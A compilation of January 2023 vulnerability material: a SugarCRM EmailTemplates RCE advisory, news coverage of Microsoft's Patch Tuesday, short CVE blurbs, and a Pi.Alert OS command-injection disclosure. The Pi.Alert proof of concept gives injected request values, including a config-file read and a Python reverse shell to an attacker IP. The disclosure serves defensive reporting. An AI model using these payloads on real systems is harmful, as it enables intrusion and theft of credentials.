In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.

SugarCRM SupportPoliciesSecuritysugarcrm-sa-2023-001

**Advisory ID**: https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001

**Revision**: 1.0

**Last Updated**: 2023-01-10

**Status**: Final

**Summary**

**Risk Level**: High

**Vulnerability**: RCE (Remote Code Execution)

**Description**

A Remote Code Execution vulnerability has been identified in the EmailTemplates. Using a specially crafted request, custom PHP code can be injected through the EmailTemplates because of missing input validation. Any user privileges can exploit this vulnerability. 

**Affected Products**

The list of affected products reflects all currently maintained versions at the publication date of this advisory. If you are running older versions than the ones reported below, we strongly advise upgrading immediately to one of the supported versions.

**Product**

**Fixed Release**

SugarCRM 12.2   
Enterprise, Sell, Serve 

12.2.0   
Hotfixed in SugarCloud 

SugarCRM 12.1   
Enterprise, Sell, Serve 

12.1.0   
Hotfixed in SugarCloud 

SugarCRM 12.0   
Enterprise, Sell, Serve 

12.0.   
Hotfix 91155 12.0.0-12.0.1 (Ent+Ult) v1.1   
Hotfix 91155 12.0.0-12.0.1 (Pro) v1.1   
Hotfixed in SugarCloud 

SugarCRM 11.3   
Professional, Enterprise, Ultimate, Sell, Serve 

11.3.0   
Hotfixed in SugarCloud 

SugarCRM 11.2   
Professional, Enterprise, Ultimate, Sell, Serve 

11.2.0   
Hotfixed in SugarCloud 

SugarCRM 11.1   
Professional, Enterprise, Ultimate, Sell, Serve 

11.1.0   
Hotfixed in SugarCloud 

SugarCRM 11.0   
Professional, Enterprise, Ultimate, Sell, Serve 

11.0.4   
Hotfix 91155 11.0.0-11.0.5 (Ent+Ult) v1.1   
Hotfix 91155 11.0.0-11.0.5 (Pro) v1.1   
Hotfixed in SugarCloud 

**Upgrades****On-Site Customers**

For more information on mitigation, please contact Sugar Support or refer to our FAQ. 

**SugarCloud and SugarCRM Managed Hosting Customers**

Hotfix has been applied to all Sugar supported versions. 

**Workaround**

There is no workaround available for this vulnerability.

**Publication History**

2023-01-10

Update audience disclosure

2023-01-03

Internal disclosure

A stand-alone copy of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. SugarCRM reserves the right to change or update this document at any time.

**Credits**

The vulnerability has been responsibly disclosed by several SugarCRM partners and has been fixed by the SugarCRM Security Team.

CVE-2023-22952: sa-2023-001 - SugarCRM Support Site

The first Patch Tuesday fixes shipped by Microsoft for 2023 have addressed a total of 98 security flaws, including one bug that the company said is being actively exploited in the wild.
11 of the 98 issues are rated Critical and 87 are rated Important in severity, with the vulnerabilities also listed as publicly known at the time of release. Separately, the Windows maker is expected to release

The first Patch Tuesday fixes shipped by Microsoft for 2023 have addressed a total of 98 security flaws, including one bug that the company said is being actively exploited in the wild.

11 of the 98 issues are rated Critical and 87 are rated Important in severity, with the vulnerabilities also listed as publicly known at the time of release. Separately, the Windows maker is expected to release updates for its Chromium-based Edge browser.

The vulnerability that's under attack relates to CVE-2023-21674 (CVSS score: 8.8), a privilege escalation flaw in Windows Advanced Local Procedure Call (ALPC) that could be exploited by an attacker to gain SYSTEM permissions.

"This vulnerability could lead to a browser sandbox escape," Microsoft noted in an advisory, crediting Avast researchers Jan Vojtěšek, Milánek, and Przemek Gmerek for reporting the bug.

While details of the vulnerability are still under wraps, a successful exploit requires an attacker to have already obtained an initial infection on the host. It is also likely that the flaw is combined with a bug present in the web browser to break out of the sandbox and gain elevated privileges.

"Once the initial foothold has been made, attackers will look to move across a network or gain additional higher levels of access and these types of privilege escalation vulnerabilities are a key part of that attacker playbook," Kev Breen, director of cyber threat research at Immersive Labs, said.

That having said, the chances that an exploit chain like this is employed in a widespread fashion is limited owing to the auto-update feature used to patch browsers, Satnam Narang, senior staff research engineer at Tenable, said.

It's also worth noting that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply patches by January 31, 2023.

What's more, CVE-2023-21674 is the fourth such flaw identified in ALPC – an inter-process communication (IPC) facility provided by the Microsoft Windows kernel – after CVE-2022-41045, CVE-2022-41093, and CVE-2022-41100 (CVSS scores: 7.8), the latter three of which were plugged in November 2022.

Two other privilege escalation vulnerabilities identified as being of high priority affect Microsoft Exchange Server (CVE-2023-21763 and CVE-2023-21764, CVSS scores: 7.8), which stem from an incomplete patch for CVE-2022-41123, according to Qualys.

"An attacker could execute code with SYSTEM-level privileges by exploiting a hard-coded file path," Saeed Abbasi, manager of vulnerability and threat research at Qualys, said in a statement.

Also resolved by Microsoft is a security feature bypass in SharePoint Server (CVE-2023-21743, CVSS score: 5.3) that could permit an unauthenticated attacker to circumvent authentication and make an anonymous connection. The tech giant noted, "customers must also trigger a SharePoint upgrade action included in this update to protect their SharePoint farm."

The January update further remediates a number of privilege escalation flaws, including one in Windows Credential Manager (CVE-2023-21726, CVSS score: 7.8) and three affecting the Print Spooler component (CVE-2023-21678, CVE-2023-21760, and CVE-2023-21765).

The U.S. National Security Agency (NSA) has been credited with reporting CVE-2023-21678. In all, 39 of the vulnerabilities that Microsoft closed out in its latest update enable the elevation of privileges.

Rounding up the list is CVE-2023-21549 (CVSS score: 8.8), a publicly known elevation of privilege vulnerability in the Windows SMB Witness Service, and another instance of security feature bypass impacting BitLocker (CVE-2023-21563, CVSS score: 6.8).

"A successful attacker could bypass the BitLocker Device Encryption feature on the system storage device," Microsoft said. "An attacker with physical access to the target could exploit this vulnerability to gain access to encrypted data."

Furthermore, Redmond has updated its guidance regarding the malicious use of signed drivers (called Bring Your Own Vulnerable Driver) to include an updated block list released as part of Windows security updates on January 10, 2023.

CISA on Tuesday also added CVE-2022-41080, an Exchange Server privilege escalation flaw, to the KEV catalog following reports that the vulnerability is being chained alongside CVE-2022-41082 to achieve remote code execution on vulnerable systems.

The exploit, codenamed OWASSRF by CrowdStrike, has been leveraged by the Play ransomware actors to breach target environments. The defects were fixed by Microsoft in November 2022.

The Patch Tuesday updates also arrive as Windows 7, Windows 8.1, and Windows RT reached end of support on January 10, 2023. Microsoft said it won't be offering an Extended Security Update (ESU) program for Windows 8.1, instead urging users to upgrade to Windows 11.

"Continuing to use Windows 8.1 after January 10, 2023 may increase an organization's exposure to security risks or impact its ability to meet compliance obligations," the company cautions.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Cisco
*   Citrix
*   Dell
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Intel
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Qualcomm
*   SAP
*   Schneider Electric
*   Siemens
*   Synology
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Issues January 2023 Patch Tuesday Updates, Warns of Zero-Day Exploit

The jokob-sk/Pi.Alert fork (before 22.12.20) of Pi.Alert allows Remote Code Execution via nmap_scan.php (scan parameter) OS Command Injection.

**Summary**

An OS Command injection vulnerability allows any unauthenticated user to execute arbitrary code on the server.

**Details**

The affected code can be found here:  
https://github.com/jokob-sk/Pi.Alert/blob/main/front/php/server/nmap\_scan.php  
As well as the corresponding leiweibau fork.  
Here is the CWE with more information on how the vulnerability works and can be fixed.  
https://cwe.mitre.org/data/definitions/78.html

Some other helpful links:  
https://cheatsheetseries.owasp.org/cheatsheets/OS\_Command\_Injection\_Defense\_Cheat\_Sheet.html  
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/12-Testing\_for\_Command\_Injection  
https://owasp.org/www-community/attacks/Command\_Injection

**PoC**

Using the default configuration, click on any device and then navigate to the nmap tab. Click on one of the nmap buttons and intercept the request via Burp Proxy. Modify the request by adding a semi-colon and then whatever other command you want to run after the scan=.

scan=192.168.1.5&mode=fast

to

scan=;whoami&mode=fast

it will come back as www-data

another useful command is

scan=;cat ../../../config/pialert.conf&mode=fast  
  

Reverse shell via python (change the ip and port to match attacker machine):

scan=;python -c 'import socket,subprocess;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("192.168.1.63",4444));subprocess.call(\["/bin/sh","-i"\],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'&mode=fast

Video of the POC (unlisted video):  
https://youtu.be/BR43Af5iykE

This same request can result in XSS as well but eh to that because un-authenticated internal only app.

**Impact**

An attacker with access to the pi.alert web UI would be able to run code on server.

CVE-2022-48252: Remote Code Execution via OS Command Injection

Microsoft's January 2023 Patch Tuesday security update contains fixes for bugs in multiple products. Here's what you need to patch now.

Microsoft's first security update for 2023 contained patches for a whopping 98 vulnerabilities, including one that attackers are actively exploiting and another that is publicly known but has not been exploited yet.

Microsoft identified 11 of the vulnerabilities it disclosed today as being of "critical" severity, meaning organizations using affected products need to prioritize these flaws before addressing the other ones. It rated the remaining 87 as "Important," which is a rating the company uses to describe vulnerabilities that, if exploited, could compromise the confidentiality, integrity, or availability of user data but are often not remotely executable or requires some level of user interaction.

**Bugs in Frequently Attacked Products**

Several of the vulnerabilities in the January 2023 security update affect products that are favorite attacker targets. Five of them, for instance, impact Microsoft Exchange Server and three — including one of the most severe flaws in this month's update — are in SharePoint.

"The volume is definitely concerning, especially given the Exchange patches and SharePoint updates," says Dustin Childs, communication manager for Trend Micro's Zero Day Initiative (ZDI) which reported 25 of the bugs that Microsoft closed today. "These are common targets — and targets that often don’t get patched," he notes. "There are also updates submitted by the National Security Agency and Canada’s Communications Security Establishment. That may raise an eyebrow or two."

Multiple security researchers identified a Microsoft SharePoint Server security feature bypass vulnerability CVE-2023-21743 as one that organizations need to jump on right away because of the risk it presents. The bug allows an unauthenticated attacker to bypass authentication and make an anonymous connection to an affected SharePoint server. One complicating factor with the vulnerability for enterprise security teams is that patching alone is not sufficient to mitigate the threat it presents. In addition, they also need to trigger a SharePoint upgrade, which Microsoft has included in this month's security update to protect against exploit activity, Microsoft said.

"This is not a 'patch it and move on' sort of bug," Childs says. "To fully address this vulnerability, admins need to take additional steps as outlined in the update documentation."

**Zero-Day Bug in Windows ALPC**

Another high-priority vulnerability in the January 2023 update is CVE-2023-21674, an actively exploited bug in Windows Advanced Local Procedure Call (ALPC) that allows an attacker to elevate privileges on a compromised system. The zero-day vulnerability impacts all Windows OS versions and could allow an attacker to escape a browser sandbox and gain system level privileges, Microsoft said.

Satnam Narang, senior staff research engineer at Tenable, says that while full details of the bug are not available, it's possible that attackers likely chained the vulnerability with a flaw in a Chromium-based browser or Microsoft Edge to break out of a browser sandbox and gain full system access. 

"Because of the improvements made in browser security, traditional browser exploits by themselves are limited by sandbox technology, restricting an attacker's ability to access the underlying operating system," Narang tells Dark Reading. He says it is likely that an advanced persistent threat group discovered and exploited the vulnerability as part of a targeted attack.

Microsoft described one of the bugs it addressed this month as publicly known but not exploited. The vulnerability, tracked as CVE-2023-21549, exists on the Windows SMB Witness Service and allows an attacker to execute remote procedure call functions normally restricted to privileged accounts only. Microsoft has assigned a score of 8.8 to the vulnerability even though it has assessed the bug as less likely to be exploited.

**A Flood of Privilege-Escalation Flaws**

Two of the 25 bugs that ZDI reported — and which Microsoft patched this month — were Exchange Server elevation-of-privilege vulnerabilities (CVE-2023-21763 and CVE-2023-21764) that resulted from a failed patch for a previous elevation of privilege flaw in Exchange tracked as CVE-2022-41123. "Thanks to the use of a hard-coded path, a local attacker could load their own DLL and execute code at the level of SYSTEM," Childs says.

In total, 39 of the bugs that Microsoft addressed in its latest update enable elevation of privileges, a category of flaw that the company often has rated as being less severe than RCE bugs. This, however, does not mean that organizations can put off addressing them. "Despite their lower score, these vulnerabilities are typically seen in the early stages of an attack and blocking attackers from gaining SYSTEM or domain-level access early in the kill chain can slow down attackers," said Kev Breen, director of cyber-threat research at Immersive Labs in a statement.

Several of the elevation of privilege bugs in the January update affect the Windows Kernel. Among them are CVE-2023-21772, CVE-2023-21750, CVE-2023-21675 and CVE-2023-21773. "The potential risk from these vulnerabilities is high since they affect all devices that run any Windows OS, starting from Windows 7," security vendor Action1 said. Seven of the privilege escalation bugs have low complexity and require low privileges and no user interaction, meaning they are easy to attack, Action1 said.

Other bugs that security researchers identified as being of high priority in Microsoft's January 2023 security update include CVE-2023-21762 and CVE-2023-21745, both of which are spoofing vulnerabilities in Microsoft Exchange Server. "Email servers like Exchange are high-value targets for attackers, as they can allow an attacker to gain sensitive information through reading emails, or to facilitate Business Email Compromise style attacks," Breen said. Organizations need to be aware of the risks that such bugs preset and mitigate them, he added.

Microsoft also updated its previous guidance around the recent use of Microsoft-signed drivers in malicious campaigns by cybercriminals. The guidance now includes a block list that blocks attackers from using the compromised certificate in their environment. For their recommended actions, the company said, "Microsoft recommends that all customers install the latest Windows updates and ensure their anti-virus and endpoint detection products are up to date with the latest signatures and are enabled to prevent these attacks."

98 Patches: Microsoft Greets New Year With Zero-Day Security Fixes

Microsoft Office Visio Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21737, CVE-2023-21738.

CVE-2023-21736

Microsoft Office Visio Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21736, CVE-2023-21738.

CVE-2023-21737

Microsoft Office Visio Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21736, CVE-2023-21737.

CVE-2023-21738

Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21742.

CVE-2023-21744

Microsoft Office Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21734.

CVE-2023-21735

Microsoft Office Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21735.

Tag

#rce